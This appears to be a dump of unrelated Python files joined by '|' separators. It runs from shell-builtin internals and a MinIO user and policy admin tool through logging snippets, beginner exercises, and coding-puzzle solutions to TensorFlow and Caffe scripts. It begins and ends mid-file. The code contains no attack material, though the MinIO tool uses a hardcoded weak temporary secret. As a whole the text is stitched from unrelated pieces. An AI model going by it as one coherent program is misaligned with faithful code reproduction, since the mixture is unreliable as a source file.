e_usage("Got -a but RHS isn't an array", span_id=span_id)
if flag_A and rval:
# Special case: declare -A A=() is OK. The () is changed to mean an empty
# associative array.
if rval.tag_() == value_e.MaybeStrArray:
array_val = cast(value__MaybeStrArray, rval)
if len(array_val.strs) == 0:
return value.AssocArray({})
#return value.MaybeStrArray([])
if rval.tag_() != value_e.AssocArray:
e_usage("Got -A but RHS isn't an associative array", span_id=span_id)
return rval
class Readonly(vm._AssignBuiltin):
def __init__(self, mem, errfmt):
# type: (Mem, ErrorFormatter) -> None
self.mem = mem
self.errfmt = errfmt
def Run(self, cmd_val):
# type: (cmd_value__Assign) -> int
arg_r = args.Reader(cmd_val.argv, spids=cmd_val.arg_spids)
arg_r.Next()
attrs = flag_spec.Parse('readonly', arg_r)
arg = arg_types.readonly(attrs.attrs)
if arg.p or len(cmd_val.pairs) == 0:
return _PrintVariables(self.mem, cmd_val, attrs, True, builtin=_READONLY)
for pair in cmd_val.pairs:
if pair.rval is None:
if arg.a:
rval = value.MaybeStrArray([]) # type: value_t
elif arg.A:
rval = value.AssocArray({})
else:
rval = None
else:
rval = pair.rval
rval = _ReconcileTypes(rval, arg.a, arg.A, pair.spid)
# NOTE:
# - when rval is None, only flags are changed
# - dynamic scope because flags on locals can be changed, etc.
_ExportReadonly(self.mem, pair, state.SetReadOnly)
return 0
class NewVar(vm._AssignBuiltin):
"""declare/typeset/local."""
def __init__(self, mem, procs, errfmt):
# type: (Mem, Dict[str, Proc], ErrorFormatter) -> None
self.mem = mem
self.procs = procs
self.errfmt = errfmt
def _PrintFuncs(self, names):
# type: (List[str]) -> int
status = 0
for name in names:
if name in self.procs:
print(name)
# TODO: Could print LST for -f, or render LST. Bash does this. 'trap'
# could use that too.
else:
status = 1
return status
def Run(self, cmd_val):
# type: (cmd_value__Assign) -> int
arg_r = args.Reader(cmd_val.argv, spids=cmd_val.arg_spids)
arg_r.Next()
attrs = flag_spec.Parse('new_var', arg_r)
arg = arg_types.new_var(attrs.attrs)
status = 0
if arg.f:
names = arg_r.Rest()
if len(names):
# This is only used for a STATUS QUERY now. We only show the name,
# not the body.
status = self._PrintFuncs(names)
else:
# Disallow this since it would be incompatible.
e_usage('with -f expects function names')
return status
if arg.F:
names = arg_r.Rest()
if len(names):
status = self._PrintFuncs(names)
else:
# bash quirk: with no names, they're printed in a different format!
for func_name in sorted(self.procs):
print('declare -f %s' % (func_name))
return status
if arg.p: # Lookup and print variables.
return _PrintVariables(self.mem, cmd_val, attrs, True)
elif len(cmd_val.pairs) == 0:
return _PrintVariables(self.mem, cmd_val, attrs, False)
#
# Set variables
#
#raise error.Usage("doesn't understand %s" % cmd_val.argv[1:])
if cmd_val.builtin_id == builtin_i.local:
which_scopes = scope_e.LocalOnly
else: # declare/typeset
if arg.g:
which_scopes = scope_e.GlobalOnly
else:
which_scopes = scope_e.LocalOnly
flags = 0
if arg.x == '-':
flags |= state.SetExport
if arg.r == '-':
flags |= state.SetReadOnly
if arg.n == '-':
flags |= state.SetNameref
flags_to_clear = 0
if arg.x == '+':
flags |= state.ClearExport
if arg.r == '+':
flags |= state.ClearReadOnly
if arg.n == '+':
flags |= state.ClearNameref
for pair in cmd_val.pairs:
rval = pair.rval
# declare -a foo=(a b); declare -a foo; should not reset to empty array
if rval is None and (arg.a or arg.A):
old_val = self.mem.GetValue(pair.var_name)
if arg.a:
if old_val.tag_() != value_e.MaybeStrArray:
rval = value.MaybeStrArray([])
elif arg.A:
if old_val.tag_() != value_e.AssocArray:
rval = value.AssocArray({})
lval = lvalue.Named(pair.var_name)
if pair.plus_eq:
old_val = sh_expr_eval.OldValue(lval, self.mem, None) # ignore set -u
# When 'typeset e+=', then rval is value.Str('')
# When 'typeset foo', the pair.plus_eq flag is false.
assert pair.rval is not None
rval = cmd_eval.PlusEquals(old_val, pair.rval)
else:
rval = _ReconcileTypes(rval, arg.a, arg.A, pair.spid)
self.mem.SetValue(lval, rval, which_scopes, flags=flags)
return status
# TODO:
# - It would make more sense to treat no args as an error (bash doesn't.)
# - Should we have strict builtins? Or just make it stricter?
class Unset(vm._Builtin):
def __init__(self, mem, procs, unsafe_arith, errfmt):
# type: (Mem, Dict[str, Proc], sh_expr_eval.UnsafeArith, ErrorFormatter) -> None
self.mem = mem
self.procs = procs
self.unsafe_arith = unsafe_arith
self.errfmt = errfmt
def _UnsetVar(self, arg, spid, proc_fallback):
# type: (str, int, bool) -> bool
"""
Returns:
bool: whether the 'unset' builtin should succeed with code 0.
"""
lval = self.unsafe_arith.ParseLValue(arg, spid)
#log('lval %s', lval)
found = False
try:
found = self.mem.Unset(lval, scope_e.Shopt)
except error.Runtime as e:
# note: in bash, myreadonly=X fails, but declare myreadonly=X doens't
# fail because it's a builtin. So I guess the same is true of 'unset'.
e.span_id = spid
self.errfmt.PrettyPrintError(e)
return False
if proc_fallback and not found:
mylib.dict_erase(self.procs, arg)
return True
def Run(self, cmd_val):
# type: (cmd_value__Argv) -> int
attrs, arg_r = flag_spec.ParseCmdVal('unset', cmd_val)
arg = arg_types.unset(attrs.attrs)
argv, arg_spids = arg_r.Rest2()
for i, name in enumerate(argv):
spid = arg_spids[i]
if arg.f:
mylib.dict_erase(self.procs, name)
elif arg.v:
if not self._UnsetVar(name, spid, False):
return 1
else:
# proc_fallback: Try to delete var first, then func.
if not self._UnsetVar(name, spid, True):
return 1
return 0
class Shift(vm._Builtin):
def __init__(self, mem):
# type: (Mem) -> None
self.mem = mem
def Run(self, cmd_val):
# type: (cmd_value__Argv) -> int
num_args = len(cmd_val.argv) - 1
if num_args == 0:
n = 1
elif num_args == 1:
arg = cmd_val.argv[1]
try:
n = int(arg)
except ValueError:
e_usage("Invalid shift argument %r" % arg)
else:
e_usage('got too many arguments')
return self.mem.Shift(n)
|
"""Extra admin commands to manage the DomiNode minIO server
This script adds some functions to perform DomiNode related tasks in a more
expedite manner than using the bare minio client `mc`.
"""
import json
import shlex
import subprocess
import tempfile
import typing
from contextlib import contextmanager
from pathlib import Path
from os import fdopen
import typer
from enum import Enum
from .constants import (
DepartmentName,
UserRole
)
_help_intro = 'Manage minIO server'
app = typer.Typer(
short_help=_help_intro,
help=(
f'{_help_intro} - Be sure to install minio CLI client (mc) before '
f'using this. Also, create a \'~/.mc/config.json\' file with the '
f'credentials of the minIO server that you want to use. Check out the'
f'minIO client docs at: \n\n'
f'https://docs.min.io/docs/minio-client-quickstart-guide.html\n\n'
f'for details on how to download mc and configure it.'
)
)
SUCCESS = "success"
DEFAULT_CONFIG_DIR = Path('~/.mc').expanduser()
class DomiNodeDepartment:
name: str
endpoint_alias: str
minio_client_config_dir: Path = DEFAULT_CONFIG_DIR
dominode_staging_bucket: str = 'dominode-staging'
public_bucket: str = 'public'
_policy_version: str = '2012-10-17'
def __init__(
self,
name: DepartmentName,
endpoint_alias: str,
minio_client_config_dir: typing.Optional[Path] = None
):
self.name = name.value
self.endpoint_alias = endpoint_alias
if minio_client_config_dir is not None:
self.minio_client_config_dir = minio_client_config_dir
@property
def staging_bucket(self) -> str:
return f'{self.name}-staging'
@property
def dominode_staging_root_dir(self) -> str:
return f'{self.dominode_staging_bucket}/{self.name}/'
@property
def production_bucket_root_dir(self) -> str:
return f'{self.public_bucket}/{self.name}/'
@property
def regular_users_group(self) -> str:
return f'{self.name}-user'
@property
def editors_group(self) -> str:
return f'{self.name}-editor'
@property
def regular_user_policy(self) -> typing.Tuple[str, typing.Dict]:
return (
f'{self.name}-regular-user-group-policy',
{
'Version': self._policy_version,
'Statement': [
{
'Sid': f'{self.name}-regular-user-deny-bucket-delete',
'Action': [
's3:DeleteBucket',
],
'Effect': 'Deny',
'Resource': [
f'arn:aws:s3:::{self.dominode_staging_bucket}',
f'arn:aws:s3:::{self.staging_bucket}',
]
},
{
'Sid': f'{self.name}-regular-user-full-access',
'Action': [
's3:*'
],
'Effect': 'Allow',
'Resource': [
f'arn:aws:s3:::{self.dominode_staging_root_dir}*',
f'arn:aws:s3:::{self.staging_bucket}/*',
]
},
{
'Sid': f'{self.name}-regular-user-read-only',
'Action': [
's3:GetBucketLocation',
's3:ListBucket',
's3:GetObject',
],
'Effect': 'Allow',
'Resource': [
f'arn:aws:s3:::{self.dominode_staging_bucket}/*',
f'arn:aws:s3:::{self.public_bucket}/*'
]
},
]
}
)
@property
def editor_user_policy(self) -> typing.Tuple[str, typing.Dict]:
return (
f'{self.name}-editor-group-policy',
{
'Version': self._policy_version,
'Statement': [
{
'Sid': f'{self.name}-editor-user-deny-bucket-delete',
'Action': [
's3:DeleteBucket',
],
'Effect': 'Deny',
'Resource': [
f'arn:aws:s3:::{self.dominode_staging_bucket}',
f'arn:aws:s3:::{self.staging_bucket}',
]
},
{
'Sid': f'{self.name}-editor-full-access',
'Action': [
's3:*'
],
'Effect': 'Allow',
'Resource': [
f'arn:aws:s3:::{self.staging_bucket}/*',
f'arn:aws:s3:::{self.dominode_staging_root_dir}*',
f'arn:aws:s3:::{self.production_bucket_root_dir}*',
]
},
{
'Sid': f'{self.name}-editor-read-only',
'Action': [
's3:GetBucketLocation',
's3:ListBucket',
's3:GetObject',
],
'Effect': 'Allow',
'Resource': [
f'arn:aws:s3:::{self.dominode_staging_bucket}/*',
f'arn:aws:s3:::{self.public_bucket}/*'
]
},
]
}
)
def create_groups(self):
create_group(
self.endpoint_alias,
self.regular_users_group,
self.minio_client_config_dir
)
create_group(
self.endpoint_alias,
self.editors_group,
self.minio_client_config_dir
)
def create_buckets(self):
extra = '--ignore-existing'
self._execute_command('mb', f'{self.staging_bucket} {extra}')
self._execute_command('mb', f'{self.dominode_staging_root_dir} {extra}')
self._execute_command(
'mb', f'{self.production_bucket_root_dir} {extra}')
def create_policies(self):
self.add_policy(*self.regular_user_policy)
self.add_policy(*self.editor_user_policy)
def add_policy(self, name: str, policy: typing.Dict):
"""Add policy to the server"""
existing_policies = self._execute_admin_command('policy list')
for item in existing_policies:
if item.get('policy') == name:
break # policy already exists
else:
os_file_handler, pathname = tempfile.mkstemp(text=True)
with fdopen(os_file_handler, mode='w') as fh:
json.dump(policy, fh)
self._execute_admin_command(
'policy add',
f'{name} {pathname}',
)
Path(pathname).unlink(missing_ok=True)
def set_policies(self):
self.set_policy(self.regular_user_policy[0], self.regular_users_group)
self.set_policy(self.editor_user_policy[0], self.editors_group)
self._set_public_policy()
def _set_public_policy(self):
self._execute_command(
'policy set download',
f'{self.production_bucket_root_dir}*'
)
def set_policy(
self,
policy: str,
group: str,
):
self._execute_admin_command(
'policy set',
f'{policy} group={group}',
)
def add_user(
self,
access_key: str,
secret_key: str,
role: typing.Optional[UserRole] = UserRole.REGULAR_DEPARTMENT_USER
):
create_user(
self.endpoint_alias,
access_key,
secret_key,
minio_client_config_dir=self.minio_client_config_dir
)
group = {
UserRole.REGULAR_DEPARTMENT_USER: self.regular_users_group,
UserRole.EDITOR: self.editors_group,
}[role]
addition_result = self._execute_admin_command(
'group add', f'{group} {access_key}',)
return addition_result[0].get('status') == SUCCESS
def _execute_command(
self,
command: str,
arguments: typing.Optional[str] = None,
):
return execute_command(
self.endpoint_alias,
command,
arguments,
self.minio_client_config_dir
)
def _execute_admin_command(
self,
command: str,
arguments: typing.Optional[str] = None,
):
return execute_admin_command(
self.endpoint_alias,
command,
arguments,
self.minio_client_config_dir
)
@app.command()
def add_department_user(
endpoint_alias: str,
access_key: str,
secret_key: str,
department_name: DepartmentName,
role: typing.Optional[UserRole] = UserRole.REGULAR_DEPARTMENT_USER,
minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
):
"""Create a user and add it to the relevant department groups
This function shall ensure that when a new user is created it is put in the
relevant groups and with the correct access policies
"""
department = DomiNodeDepartment(
department_name, endpoint_alias, minio_client_config_dir)
return department.add_user(access_key, secret_key, role)
@app.command()
def add_department(
endpoint_alias: str,
name: DepartmentName,
minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
):
"""Add a new department
This includes:
- Adding department staging bucket
- Adding department groups
"""
department = DomiNodeDepartment(
name, endpoint_alias, minio_client_config_dir)
# typer.echo(f'department config_dir: {department.minio_client_config_dir}')
department.create_groups()
department.create_buckets()
department.create_policies()
department.set_policies()
@app.command()
def bootstrap(
endpoint_alias: str,
minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
):
"""Perform initial bootstrap of the minIO server
This function will take care of creating the relevant buckets, groups and
access controls for using the minIO server for DomiNode.
"""
for member in DepartmentName:
add_department(endpoint_alias, member, minio_client_config_dir)
def create_group(
endpoint_alias: str,
group: str,
minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
) -> typing.Optional[str]:
existing_groups = execute_admin_command(
endpoint_alias,
'group list',
minio_client_config_dir=minio_client_config_dir
)
for existing in existing_groups:
if existing.get('name') == group:
result = group
break
else:
# minio does not allow creating empty groups so we need a user first
with get_temp_user(endpoint_alias, minio_client_config_dir) as user:
temp_access_key = user[0]
creation_result = execute_admin_command(
endpoint_alias,
'group add',
f'{group} {temp_access_key}',
minio_client_config_dir=minio_client_config_dir
)
relevant_result = creation_result[0]
if relevant_result.get('status') == SUCCESS:
result = group
else:
result = None
return result
def remove_group(
endpoint_alias: str,
group: str,
minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
):
removal_result = execute_admin_command(
endpoint_alias, 'group remove', group, minio_client_config_dir)
return removal_result[0].get('status') == SUCCESS
def create_temp_user(
endpoint_alias: str,
minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
) -> typing.Optional[typing.Tuple[str, str]]:
access_key = 'tempuser'
secret_key = '12345678'
created = create_user(
endpoint_alias,
access_key,
secret_key,
force=True,
minio_client_config_dir=minio_client_config_dir
)
if created:
result = access_key, secret_key
else:
result = None
return result
@contextmanager
def get_temp_user(
endpoint_alias: str,
minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
):
user_creds = create_temp_user(endpoint_alias, minio_client_config_dir)
if user_creds is not None:
access_key, secret_key = user_creds
try:
yield user_creds
finally:
execute_admin_command(
endpoint_alias,
'user remove',
access_key,
minio_client_config_dir=minio_client_config_dir
)
def create_user(
endpoint_alias: str,
access_key: str,
secret_key: str,
force: bool = False,
minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
) -> bool:
# minio allows overwriting users with the same access_key, so we check if
# user exists first
existing_users = execute_admin_command(
endpoint_alias,
'user list',
minio_client_config_dir=minio_client_config_dir
)
if len(secret_key) < 8:
raise RuntimeError(
'Please choose a secret key with 8 or more characters')
for existing in existing_users:
if existing.get('accessKey') == access_key:
user_already_exists = True
break
else:
user_already_exists = False
if not user_already_exists or (user_already_exists and force):
creation_result = execute_admin_command(
endpoint_alias,
'user add',
f'{access_key} {secret_key}',
minio_client_config_dir=minio_client_config_dir
)
result = creation_result[0].get('status') == SUCCESS
elif user_already_exists: # TODO: should log that user was not recreated
result = True
else:
result = False
return result
def execute_command(
endpoint_alias: str,
command: str,
arguments: typing.Optional[str] = None,
minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
):
full_command = (
f'mc --config-dir {minio_client_config_dir} --json {command} '
f'{"/".join((endpoint_alias, arguments or ""))}'
)
typer.echo(full_command)
parsed_command = shlex.split(full_command)
completed = subprocess.run(
parsed_command,
capture_output=True
)
try:
completed.check_returncode()
except subprocess.CalledProcessError:
typer.echo(completed.stdout)
raise
result = [json.loads(line) for line in completed.stdout.splitlines()]
return result
def execute_admin_command(
endpoint_alias: str,
command: str,
arguments: typing.Optional[str] = None,
minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
) -> typing.List:
"""Uses the ``mc`` binary to perform admin tasks on minIO servers"""
full_command = (
f'mc --config-dir {minio_client_config_dir} --json admin {command} '
f'{endpoint_alias} {arguments or ""}'
)
parsed_command = shlex.split(full_command)
completed = subprocess.run(
parsed_command,
capture_output=True
)
try:
completed.check_returncode()
except subprocess.CalledProcessError:
typer.echo(completed.stdout)
typer.echo(completed.stderr)
raise
result = [json.loads(line) for line in completed.stdout.splitlines()]
return result
if __name__ == '__main__':
app() |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import sys
import threading
import time
gEnableTracing = False
def SetTracingEnabled(isEnabled):
global gEnableTracing
gEnableTracing = isEnabled
def LogTrace(string):
global gEnableTracing
if gEnableTracing:
threadName = threading.currentThread().getName().ljust(12)
print >> sys.stdout, time.asctime() + " " + threadName + " TRACE " + string
def LogError(string):
threadName = threading.currentThread().getName().ljust(12)
print >> sys.stderr, time.asctime() + " " + threadName + " ERROR " + string
def LogMessage(string):
threadName = threading.currentThread().getName().ljust(12)
print >> sys.stdout, time.asctime() + " " + threadName + " " + string
|
from .. import sensors
from ..components.headlight import Headlight
from signal import pause
from time import sleep
s = sensors.UltrasonicSensor()
led = Headlight()
while True:
if s.distance < 1:
print(s.distance)
if s.in_range:
print(s.next_turn())
break
sleep(0.3)
def on():
led.on()
def off():
led.off()
# NOTE: when these events are bind, the distance and in_range will stop working
s.when_in_range = on
s.when_out_of_range = off
pause()
|
import os
import glob
import logging
from logging.handlers import RotatingFileHandler
LOG_FILENAME = 'logging_rotatingfile_example.out'
# Set up a specific logger with our desired output level
my_logger = logging.getLogger('MyLogger')
my_logger.setLevel(logging.DEBUG)
formatter = logging.Formatter("[%(asctime)s] {%(pathname)s:%(lineno)d %(levelname)s - %(message)s}")
handler = RotatingFileHandler(LOG_FILENAME, maxBytes=10, backupCount=2)
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
my_logger.addHandler(handler)
for i in range(20):
my_logger.debug('i = %d' % i)
logfiles = glob.glob('%s*' % LOG_FILENAME)
for f in logfiles:
print(f)
# for f in logfiles:
# os.remove(f)
|
#import module
import math
'''
Collection of some small practice questions
Create a Cricle class and intialize it with radius. Make two methods getArea and getCircumference inside this class.
'''
class circle():
def __init__(self,radius):
self.radius = radius
def getArea(self):
return 3.14*(self.radius *self.radius)
def getCircumference(self):
return 3.14*self.radius*2
Circle = circle(5)
print(Circle.getArea())
print('%.2f'%Circle.getCircumference()) #limit decimal places by '%.2f'%value
print("\n\n\n")
'''
Create a Temprature class. Make two methods :
1. convertFahrenheit - It will take celsius and will print it into Fahrenheit.
2. convertCelsius - It will take Fahrenheit and will convert it into Celsius.
'''
#we do not need a constructor for this class
class Temperature():
def convertFahrenheit(self, celsius):
return(celsius * 1.8) + 32
def convertCelcius(self, fahrenheit):
return(fahrenheit - 32) / 1.8
myTemp = Temperature()
cTemp = 20
fTemp = 68
print("farhenheit",myTemp.convertFahrenheit(cTemp))
print("celcius", myTemp.convertCelcius(fTemp))
print('\n\n\n')
'''
Create a Student class and initialize it with name and roll number. Make methods to :
1. Display - It should display all informations of the student.
2. setAge - It should assign age to student
3. setMarks - It should assign marks to the student.
'''
class Student():
def __init__(self,name, roll_number):
self.roll_number = roll_number
self.name = name
self.Age = None
self.Marks = None
def Display(self,):
print("\nRoll Number : ", self.roll_number,
"\nName : ", self.name,
"\nAge : ", self.Age,
"\nMarks : ", self.Marks)
def setAge(self, Age):
self.Age = Age
def setMarks(self, Marks):
self.Marks = Marks
Mauricio = Student("Mauricio",8)
Mauricio.Display()
Mauricio.setAge(24)
Mauricio.setMarks(4.0)
Mauricio.Display()
print("\n\n\n")
"""
Question:
Define a class, which have a class parameter and have a same instance parameter.
"""
class Person:
name = "Person"
def __init__(self, name = None):
self.name = name
jeffrey = Person("Jeffrey")
print ("%s name is %s" %(Person.name, jeffrey.name))
nico = Person()
nico.name = "Nico"
print ("%s name is %s" % (Person.name, nico.name))
print("\n\n\n")
"""
Question:
Define a class named American and its subclass NewYorker.
"""
class American(object):
pass #allows function.class to be empty
class NewYorker(American):
pass
anAmerican = American()
aNewYorker = NewYorker()
print (anAmerican)
print (aNewYorker)
print("\n\n\n")
"""
Write a Python program to create a singly linked list, append some items and iterate through the list.
extra material, finish the linked list with all useful functions
"""
#remember for lists we create both the node class and the list class
class Node:
#singly linked node
def __init__(self, data=None):
self.data = data
self.next = None
class singly_linked_list:
def __init__(self):
#create an empty list
self.tail = None
self.head = Node() #in this model our head will always be empty (not sure if i like it)
self.count = 0
def append(self, data): #add a node
new_node = Node(data)
cur = self.head
while cur.next != None: #if next is empty, we will add new node to end
cur = cur.next
cur.next = new_node
self.tail = new_node #while we are add it. the node we append is the tail node
def length(self):
cur = self.head
total = 0
while cur.next != None:
cur = cur.next
total += 1
return total
def display(self):
linkedlist = []
cur = self.head
while cur.next != None:
cur = cur.next #we go to next because our head is empty
linkedlist.append(cur.data) #then we add data to list
print(linkedlist)
def get(self, index):
count = 0
cur = self.head
if index <= self.length():
while cur.next != None:
if index == count:
return cur.data
else:
cur = cur.next
count +=1
else:
print("ERROR: index out of bounds")
return
def erase(self, index):
if index >= self.length() or index < 0:
print("ERROR: index out of range")
return
count = 1
cur = self.head
while True:
last = cur
cur = cur.next #so now we have cur node and last as the one before
if count == index:
last.next = cur.next #so our previous nodes "next" will be not this node but the one after
return #that way we can take out the middle node without breaking chain
count += 1
def iterate(self): #yield each node
cur = self.head
while cur.next != None:
cur = cur.next
yield cur.data
return
linkedlist = singly_linked_list()
linkedlist.append('apple')
linkedlist.display()
linkedlist.append("banana")
linkedlist.append("melon")
linkedlist.append("strawberry")
linkedlist.append("pear")
linkedlist.append("mango")
linkedlist.display()
print(linkedlist.length())
print(linkedlist.get(3)) #with this system, third item is 1,2,3 not 0,1,2
for val in linkedlist.iterate():
print(val)
print("\n")
linkedlist.erase(2)
linkedlist.display()
print('\n')
'''
Cloud pathing problem.
find the shortest path. you can hop on 0, not on 1
you can either advance 1 or 2 spots.
'''
count = 0
jumps = 0
c = [0,1,0,0,1,0,0,1,0]
while count < len(c) - 1: # we assume the last cloud cant be thunder
if count < (len(c) - 2) and c[(count + 2)] != 1:
jumps += 1
count += 2
else:
jumps += 1
count += 1
print(jumps)
print('\n\n')
s = "abcda"
count = s.count('a')
print(count) |
def countTriplets(arr, r):
d = {}
for i in arr:
if i not in d:
d[i] = 1
else:
d[i] += 1
count = 0
if r == 1:
for key in d:
count += d[key] * (d[key] - 1) * (d[key] - 2) / 6
return int(count)
else:
for key in d:
try:
count += d[key] * d[key * r] * d[key * r * r]
except:
continue
return count |
from flask import Flask,jsonify,request
app = Flask(__name__)
@app.route('/person/<person_id>')
def person(person_id):
response = jsonify({'hello':person_id})
return response
if __name__ == '__main__':
app.run()
|
class Solution:
def maxProfit(self, prices:list) -> int:
dp = [0] * len(prices)
for i in range(len(prices)):
print('dp:', dp)
if i > 0 and prices[i] > prices[i-1]:
# dp[i] 加上 prices[i] 减去上一次买入的价格
dp[i] += dp[i-1] + prices[i] - prices[i-1]
else:
dp[i] = dp[i-1]
return dp[i]
if __name__ == '__main__':
obj = Solution()
print(obj.maxProfit([7, 1, 5, 3, 6, 4]))
print(obj.maxProfit([1,2,3,4,5]))
print(obj.maxProfit([7,6,4,3,1])) |
# -*- coding: UTF-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import seq_LSTM_filter as slf
from tensorflow.python.framework import ops
ops.reset_default_graph()
# parameters
INPUT_LENGTH = 1 # the input data length at one time
if __name__ == '__main__':
# generates the data set for training and testing
y_orig, y_awgn = slf.signal(standard_deviation=0.3, signal_type='sin')
training_size = int(slf.SIGNAL_LENGTH * slf.TRAINING_SET_RATIO)
test_size = slf.SIGNAL_LENGTH - training_size
# x_training = (y_awgn[0: training_size]).reshape(training_size, INPUT_LENGTH, -1)
# x_test = (y_awgn[training_size: slf.SIGNAL_LENGTH]).reshape(test_size, INPUT_LENGTH, -1)
x_training = (y_awgn[0: training_size]).reshape(training_size, INPUT_LENGTH, -1)
x_test = (y_awgn[training_size: slf.SIGNAL_LENGTH]).reshape(test_size, INPUT_LENGTH, -1)
y_training = (y_orig[0: training_size]).reshape(training_size ,-1)
y_test = (y_orig[training_size: slf.SIGNAL_LENGTH]).reshape(test_size, -1)
a = tf.nn.tanh
# starts a session
sess = tf.Session()
# input
X = tf.placeholder(dtype=tf.float32, shape=[None, INPUT_LENGTH, slf.DATA_DIM])
Y = tf.placeholder(dtype=tf.float32, shape=[None, slf.DATA_DIM])
# hidden layer
layer_1 = slf.nn_single_layer(X, slf.DATA_DIM, slf.HIDDEN_SIZE, activation_function=a)
layer_2 = slf.nn_single_layer(layer_1, slf.HIDDEN_SIZE, slf.HIDDEN_SIZE, activation_function=a)
# output
y = slf.nn_single_layer(layer_2, slf.HIDDEN_SIZE, slf.DATA_DIM, activation_function=a)
y = tf.reshape(y, [-1, slf.DATA_DIM])
# calculates the mean-squared loss
loss = tf.reduce_mean(tf.reduce_sum(tf.square(y - Y), reduction_indices=[1]))
# init
train_op = tf.train.GradientDescentOptimizer(slf.LEARNING_RATE).minimize(loss)
init = tf.global_variables_initializer()
sess.run(init)
# trains the model
for k in range(0, slf.TRAINING_ITER):
_, loss_training = sess.run([train_op, loss], feed_dict={X: x_training, Y: y_training})
# prints the loss on the training set and the test set respectively
if k%(slf.TRAINING_ITER/10) == 0:
y_out = sess.run(y, feed_dict={X: x_test})
loss_test = np.sqrt(((y_out - y_test) ** 2).mean(axis=0))
print("After %d iterations, loss on the training set: %f, on the test set: %f" % (k, loss_training, loss_test))
# plot
y_in = y_awgn[training_size: slf.SIGNAL_LENGTH]
y_sig = y_orig[training_size: slf.SIGNAL_LENGTH]
plt.figure(1)
l_out, = plt.plot(y_out, label='output')
l_in, = plt.plot(y_in, label='input')
l_sig, = plt.plot(y_sig, label='signal')
plt.legend(handles = [l_out, l_in, l_sig])
plt.xlabel('Time')
plt.ylabel('Amplitude')
plt.title('The input signal with AWGN and filtered waveform by the NN model')
plt.show()
|
import numpy as np
import time
from skimage.io import imread
import matplotlib.pyplot as plt
import scipy.io as sio
from scipy.misc import imresize
from matplotlib.patches import Circle
import sys
sys.path.append('/home/pieter/projects/caffe/python')
import caffe
def loadModel():
model_def = '/home/pieter/projects/engagement-l2tor/data/model/deploy_demo.prototxt'
model_weights = '/home/pieter/projects/engagement-l2tor/data/model/binary_w.caffemodel'
network = caffe.Net(model_def, model_weights, caffe.TEST)
return network
def prepImages(img, e):
"""
Output images of prepImages are exactly the same as the matlab ones
Keyword Arguments:
img -- image with subject for gaze calculation
e -- head location (relative) [x, y]
"""
input_shape = [227, 227]
alpha = 0.3
img = imread(img)
img_resize = None
#height, width
#crop of face (input 2)
wy = int(alpha * img.shape[0])
wx = int(alpha * img.shape[1])
center = [int(e[0]*img.shape[1]), int(e[1]*img.shape[0])]
y1 = int(center[1]-.5*wy) - 1
y2 = int(center[1]+.5*wy) - 1
x1 = int(center[0]-.5*wx) - 1
x2 = int(center[0]+.5*wx) - 1
#make crop of face from image
im_face = img[y1:y2, x1:x2, :]
#subtract mean from images
places_mean = sio.loadmat('data/model/places_mean_resize.mat')
imagenet_mean = sio.loadmat('data/model/imagenet_mean_resize.mat')
places_mean = places_mean['image_mean']
imagenet_mean = imagenet_mean['image_mean']
#resize image and subtract mean
img_resize = imresize(img, input_shape, interp='bicubic')
img_resize = img_resize.astype('float32')
img_resize = img_resize[:,:,[2,1,0]] - places_mean
img_resize = np.rot90(np.fliplr(img_resize))
#resize eye image
eye_image = imresize(im_face, input_shape, interp='bicubic')
eye_image = eye_image.astype('float32')
eye_image_resize = eye_image[:,:,[2,1,0]] - imagenet_mean
eye_image_resize = np.rot90(np.fliplr(eye_image_resize))
#get everything in the right input format for the network
img_resize, eye_image_resize = fit_shape_of_inputs(img_resize, eye_image_resize)
z = eyeGrid(img, [x1, x2, y1, y2])
z = z.astype('float32')
return img, img_resize, eye_image_resize, z
def fit_shape_of_inputs(img_resize, eye_image_resize):
"""Fits the input for the forward pass."""
input_image_resize = img_resize.reshape([img_resize.shape[0], \
img_resize.shape[1], \
img_resize.shape[2], 1])
input_image_resize = input_image_resize.transpose(3, 2, 0, 1)
eye_image_resize = eye_image_resize.reshape([eye_image_resize.shape[0], \
eye_image_resize.shape[1], \
eye_image_resize.shape[2], 1])
eye_image_resize = eye_image_resize.transpose(3, 2, 0, 1)
return input_image_resize, eye_image_resize
def eyeGrid(img, headlocs):
"""Calculates the relative location of the eye.
Keyword Arguments:
img -- original image
headlocs -- relative head location
"""
w = img.shape[1]
h = img.shape[0]
x1_scaled = headlocs[0] / w
x2_scaled = headlocs[1] / w
y1_scaled = headlocs[2] / h
y2_scaled = headlocs[3] / h
center_x = (x1_scaled + x2_scaled) * 0.5
center_y = (y1_scaled + y2_scaled) * 0.5
eye_grid_x = np.floor(center_x * 12).astype('int')
eye_grid_y = np.floor(center_y * 12).astype('int')
eyes_grid = np.zeros([13, 13]).astype('int')
eyes_grid[eye_grid_y, eye_grid_x] = 1
eyes_grid_flat = eyes_grid.flatten()
eyes_grid_flat = eyes_grid_flat.reshape(1, len(eyes_grid_flat), 1, 1)
return eyes_grid_flat
def predictGaze(network, image, head_image, head_loc):
"""Loads data in network and does a forward pass."""
network.blobs['data'].data[...] = image
network.blobs['face'].data[...] = head_image
network.blobs['eyes_grid'].data[...] = head_loc
f_val = network.forward()
return f_val
def postProcessing(f_val):
"""Combines the 5 outputs into one heatmap and calculates the gaze location
Keyword arguments:
f_val -- output of the Caffe model
"""
fc_0_0 = f_val['fc_0_0'].T
fc_0_1 = f_val['fc_0_1'].T
fc_m1_0 = f_val['fc_m1_0'].T
fc_0_1 = f_val['fc_0_1'].T
fc_0_m1 = f_val['fc_0_m1'].T
f_0_0 = np.reshape(fc_0_0, (5,5))
f_1_0 = np.reshape(fc_0_1, (5,5))
f_m1_0 = np.reshape(fc_m1_0, (5,5))
